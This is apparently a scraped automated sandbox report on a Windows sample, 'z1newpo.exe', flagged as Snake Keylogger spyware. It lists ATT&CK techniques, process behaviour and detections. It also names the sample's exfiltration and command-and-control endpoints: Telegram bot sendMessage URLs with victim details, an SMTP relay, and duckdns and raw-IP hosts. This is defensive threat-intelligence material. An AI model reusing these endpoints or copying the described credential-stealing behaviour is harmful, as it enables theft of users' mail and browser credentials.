                    Virtualization/Sandbox Evasion                    		VNCGUI Input Capture24
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Virtualization/Sandbox Evasion                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1513179 Sample: z1newpo.exe Startdate: 18/09/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 52 11 other signatures 2->52 8 z1newpo.exe 3 2->8         started        11 wscript.exe 1 2->11         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\name.exe, PE32 8->26 dropped 14 name.exe 1 8->14         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->58 18 name.exe 11->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\...\name.vbs, data 14->28 dropped 60 Antivirus detection for dropped file 14->60 62 Multi AV Scanner detection for dropped file 14->62 64 Machine Learning detection for dropped file 14->64 70 2 other signatures 14->70 20 RegSvcs.exe 15 2 14->20         started        66 Writes to foreign memory regions 18->66 68 Maps a DLL or memory area into another process 18->68 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49726, 49739 TELEGRAMRU United Kingdom 20->36 38 us2.smtp.mailhostbox.com 208.91.198.143, 49732, 49740, 587 PUBLIC-DOMAIN-REGISTRYUS United States 20->38 40 2 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    z1newpo.exe74%ReversingLabsWin32.Spyware.Snakekeylogger
                    z1newpo.exe100%AviraHEUR/AGEN.1321293
                    z1newpo.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\directory\name.exe100%AviraHEUR/AGEN.1321293
                    C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\directory\name.exe74%ReversingLabsWin32.Spyware.Snakekeylogger

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe
                    https://www.office.com/lB0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    		208.91.198.143
                    		truetrue
                      		unknown
                      reallyfreegeoip.org
                      		188.114.96.3
                      		truetrue
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown
                          checkip.dyndns.com
                          		132.226.8.169
                          		truefalse
                            		unknown
                            checkip.dyndns.org
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://reallyfreegeoip.org/xml/8.46.123.33false
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://checkip.dyndns.org/false
                              • URL Reputation: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/RegSvcs.exe, 0000000D.00000002.3689181352.00000000027E9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.orgRegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.org/botname.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://us2.smtp.mailhostbox.comRegSvcs.exe, 00000003.00000002.3688609885.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002833000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.office.com/lBRegSvcs.exe, 00000003.00000002.3688609885.0000000002771000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027F3000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://chrome.google.com/webstore?hl=enRegSvcs.exe, 0000000D.00000002.3689181352.00000000027B8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://varders.kozow.com:8081name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://aborters.duckdns.org:8081name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000003.00000002.3688609885.0000000002629000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026AA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://anotherarmy.dns.army:8081name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://checkip.dyndns.org/qname.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.3688609885.000000000273F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedname.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://reallyfreegeoip.org/xml/name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              132.226.8.169
                              		checkip.dyndns.comUnited States
                              		16989UTMEMUSfalse
                              208.91.198.143
                              		us2.smtp.mailhostbox.comUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                              149.154.167.220
                              		api.telegram.orgUnited Kingdom
                              		62041TELEGRAMRUtrue
                              188.114.96.3
                              		reallyfreegeoip.orgEuropean Union
                              		13335CLOUDFLARENETUStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1513179
                              Start date and time:2024-09-18 15:25:06 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 10m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:z1newpo.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 54
                              • Number of non-executed functions: 309
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: z1newpo.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:26:03API Interceptor16264085x Sleep call for process: RegSvcs.exe modified
                              15:26:04AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              132.226.8.169rNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              Dekont_20240917_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              TVY67438038-GH93GHDBHSJUJS-PLS7838WU0.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              Quotation QT-433.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              M.V CHARIKLIA JUNIOR - PARTICULARS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              CHARIKLIA JUNIOR - PARTICULARS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              PO#005.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              ENQUIRY FOR QUOTATION REF.NO-2009008766.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              208.91.198.143z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                  z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                    SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          giehjhgjzJ.htaGet hashmaliciousCobalt Strike, MassLogger RAT, Snake KeyloggerBrowse
                                            NGL1Of0ZkJ.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                              SecuriteInfo.com.Win32.PWSX-gen.19673.26192.exeGet hashmaliciousAgentTeslaBrowse
                                                Edsha_PO.xlsGet hashmaliciousAgentTeslaBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  us2.smtp.mailhostbox.comInvoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.224
                                                  z47TTSWIFTCOPY.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.223
                                                  Invoice Request.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.224
                                                  SecuriteInfo.com.Trojan.PackedNET.3050.5454.27030.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.225
                                                  z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.198.143
                                                  SecuriteInfo.com.Win32.PWSX-gen.12778.1808.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.225
                                                  EXmRyGiPUc.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.223
                                                  z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.198.143
                                                  love.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.225
                                                  z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.198.143
                                                  reallyfreegeoip.orgrNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.97.3
                                                  MT LADY YASSO VESSEL BRIEF DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  IMG_1507_1603.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  MT103 SWIFT COPY.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.97.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  Quotation 47923.exeGet hashmaliciousSnake Keylogger, VIP Keylogger, XRedBrowse
                                                  • 188.114.96.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.97.3
                                                  api.telegram.orgrNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Order #SS1953pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 149.154.167.220
                                                  SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 149.154.167.220
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Quotation 47923.exeGet hashmaliciousSnake Keylogger, VIP Keylogger, XRedBrowse
                                                  • 149.154.167.220
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  PO000002519 - Request for details.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Dekont_20240917_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  NzEsfIiAc0.exeGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  checkip.dyndns.comrNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.8.169
                                                  MT LADY YASSO VESSEL BRIEF DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 193.122.130.0
                                                  IMG_1507_1603.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 158.101.44.242
                                                  MT103 SWIFT COPY.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                  • 158.101.44.242
                                                  SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 193.122.130.0
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 193.122.130.0
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 132.226.247.73
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 158.101.44.242
